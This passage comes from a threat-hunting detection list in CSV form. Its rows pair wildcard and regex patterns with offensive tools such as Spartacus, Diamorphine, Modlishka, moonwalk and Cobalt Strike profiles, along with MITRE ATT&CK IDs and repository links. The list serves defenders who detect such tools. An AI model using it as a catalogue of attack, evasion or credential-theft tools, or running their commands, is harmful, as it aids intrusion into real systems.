*.cap*",".{0,1000}\-\-mode\s3\s\-\-type\shandshake\s\-\-essid\s.{0,1000}\s\-\-verbose\s\-d\sdicts\/.{0,1000}\s\-\-read\s.{0,1000}\.cap.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. 
supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","0","N/A","N/A","10","923","178","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" "*--mode 3 --type pmkid --verbose -d dicts/* --read *.txt*",".{0,1000}\-\-mode\s3\s\-\-type\spmkid\s\-\-verbose\s\-d\sdicts\/.{0,1000}\s\-\-read\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","0","N/A","N/A","10","923","178","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" "*--mode com --acl --csv *",".{0,1000}\-\-mode\scom\s\-\-acl\s\-\-csv\s.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*--mode com --procmon *",".{0,1000}\-\-mode\scom\s\-\-procmon\s.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*--mode dll --existing --pml *",".{0,1000}\-\-mode\sdll\s\-\-existing\s\-\-pml\s.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*--mode dll --procmon *",".{0,1000}\-\-mode\sdll\s\-\-procmon\s.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*--mode proxy --action prototypes --path *prototypes.csv*",".{0,1000}\-\-mode\sproxy\s\-\-action\sprototypes\s\-\-path\s.{0,1000}prototypes\.csv.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*--mode proxy --dll *.dll*--external-resources*",".{0,1000}\-\-mode\sproxy\s\-\-dll\s.{0,1000}\.dll.{0,1000}\-\-external\-resources.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*--mode proxy --ghidra *--dll *",".{0,1000}\-\-mode\sproxy\s\-\-ghidra\s.{0,1000}\-\-dll\s.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*MODE=* REMOTE=*sshimpanzee*",".{0,1000}MODE\=.{0,1000}\sREMOTE\=.{0,1000}sshimpanzee.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mechanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - 
UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lexfo/sshimpanzee","1","0","N/A","10","10","228","26","2024-01-29T14:20:03Z","2023-04-03T10:11:27Z" "*ModHideDrv_x64.sys*",".{0,1000}ModHideDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*Modified by: Trevohack aka *SpaceShuttleIO*",".{0,1000}Modified\sby\:\sTrevohack\saka\s.{0,1000}SpaceShuttleIO.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*Modified-Amsi-ScanBuffer-Patch*",".{0,1000}Modified\-Amsi\-ScanBuffer\-Patch.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","1","N/A","10","10","1492","260","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z" "*ModifiedVulnerableBinaryFormatters\info.txt*",".{0,1000}ModifiedVulnerableBinaryFormatters\\info\.txt.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - 
TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*Modify the TP_POOL linked list Flinks and Blinks to point to the malicious task*",".{0,1000}Modify\sthe\sTP_POOL\slinked\slist\sFlinks\sand\sBlinks\sto\spoint\sto\sthe\smalicious\stask.{0,1000}","offensive_tool_keyword","Thread-Pool-Injection-PoC","Proof of concept code for thread pool based process injection in Windows.","T1055.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/Uri3n/Thread-Pool-Injection-PoC","1","0","N/A","8","1","70","9","2024-02-11T18:45:31Z","2024-01-24T07:42:08Z" "*Modlishka/config*",".{0,1000}Modlishka\/config.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4675","865","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z" "*MODLISHKA_BIN*",".{0,1000}MODLISHKA_BIN.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. 
without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","0","N/A","5","10","4675","865","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z" "*Modlishka-linux-amd64*",".{0,1000}Modlishka\-linux\-amd64.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4675","865","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z" "*Modlishka-windows-*-amd64.exe*",".{0,1000}Modlishka\-windows\-.{0,1000}\-amd64\.exe.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. 
without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4675","865","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z" "*module EvilProxy*",".{0,1000}module\sEvilProxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*module inject *",".{0,1000}module\sinject\s.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*module powerup*",".{0,1000}module\spowerup.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*Module to generate shellcode out of raw metasploit shellcode file*",".{0,1000}Module\sto\sgenerate\sshellcode\sout\sof\sraw\smetasploit\sshellcode\sfile.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","0","N/A","10","10","1352","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z" 
"*MODULE_AUTHOR(""m0nad"")*",".{0,1000}MODULE_AUTHOR\(\""m0nad\""\).{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*MODULE_DESCRIPTION(""LKM rootkit""*",".{0,1000}MODULE_DESCRIPTION\(\""LKM\srootkit\"".{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*MODULE_NAME ""diamorphine""*",".{0,1000}MODULE_NAME\s\""diamorphine\"".{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*modules*daclread.py*",".{0,1000}modules.{0,1000}daclread\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*modules.gtfobins import GTFOBins*",".{0,1000}modules\.gtfobins\simport\sGTFOBins.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation 
tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*modules.interesting_files import InterestingFiles*",".{0,1000}modules\.interesting_files\simport\sInterestingFiles.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*modules/enumrate.py*",".{0,1000}modules\/enumrate\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*modules/exploits/*.js*",".{0,1000}modules\/exploits\/.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*modules/exploits/*.rb*",".{0,1000}modules\/exploits\/.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*modules/nemesis.rb*",".{0,1000}modules\/nemesis\.rb.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*mogwailabs*",".{0,1000}mogwailabs.{0,1000}","offensive_tool_keyword","Github Username","MOGWAI LABS is an infosec boutique with a strong emphasis on offensive security github repo hosting offensive tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/mogwailabs","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*mojo.5688.8052.183894939787088877##*",".{0,1000}mojo\.5688\.8052\.183894939787088877\#\#.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","pipe name","10","10","204","46","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*mojo.5688.8052.35780273329370473##*",".{0,1000}mojo\.5688\.8052\.35780273329370473\#\#.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","pipe 
name","10","10","204","46","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*mojo_##*",".{0,1000}mojo_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*monero2john.py*",".{0,1000}monero2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*money2john.py*",".{0,1000}money2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*mongodb2john.js*",".{0,1000}mongodb2john\.js.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Monkey Island v*_windows.exe*",".{0,1000}Monkey\sIsland\sv.{0,1000}_windows\.exe.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*monkey*tunnel.py*",".{0,1000}monkey.{0,1000}tunnel\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*monkey\infection_monkey*",".{0,1000}monkey\\infection_monkey.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*monkey_island.exe*",".{0,1000}monkey_island\.exe.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*monkey32.exe *",".{0,1000}monkey32\.exe\s.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 
T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*monkey64.exe *",".{0,1000}monkey64\.exe\s.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*monkey-linux-32*",".{0,1000}monkey\-linux\-32.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*monkey-linux-64*",".{0,1000}monkey\-linux\-64.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*monkey-windows-32.exe*",".{0,1000}monkey\-windows\-32\.exe.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*monkey-windows-64.exe*",".{0,1000}monkey\-windows\-64\.exe.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*monoxgas/Koppeling*",".{0,1000}monoxgas\/Koppeling.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / 
dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","1","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*monoxgas/sRDI*",".{0,1000}monoxgas\/sRDI.{0,1000}","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","10","1997","453","2023-11-15T10:53:00Z","2017-07-28T19:30:53Z" "*moom825/xeno-rat*",".{0,1000}moom825\/xeno\-rat.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*moonD4rk/HackBrowserData*",".{0,1000}moonD4rk\/HackBrowserData.{0,1000}","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","10","10","94","17","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z" "*moonwalk finish*",".{0,1000}moonwalk\sfinish.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "*moonwalk get *history*",".{0,1000}moonwalk\sget\s.{0,1000}history.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "*moonwalk start*",".{0,1000}moonwalk\sstart.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "*MooseDojo*",".{0,1000}MooseDojo.{0,1000}","offensive_tool_keyword","Github Username","github repo that was hosting exploitation tools. 
may be used by other exploitation tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/MooseDojo","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*morphHTA*",".{0,1000}morphHTA.{0,1000}","offensive_tool_keyword","morphHTA","morphHTA - Morphing Cobalt Strikes evil.HTA payload generator","T1059.007 - T1027.002 - T1564.001 - T1547.001","TA0002 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/vysecurity/morphHTA","1","1","N/A","N/A","6","514","132","2023-04-14T19:15:57Z","2017-02-24T11:27:00Z" "*mortar-loader.html*",".{0,1000}mortar\-loader\.html.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products. Mortar Loader performs encryption and decryption of selected binary inside the memory streams and executes it directly without writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","10","10","1347","219","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z" "*mortar-main.zip*",".{0,1000}mortar\-main\.zip.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products. Mortar Loader performs encryption and decryption of selected binary inside the memory streams and executes it directly without writing any malicious indicator into the hard-drive. 
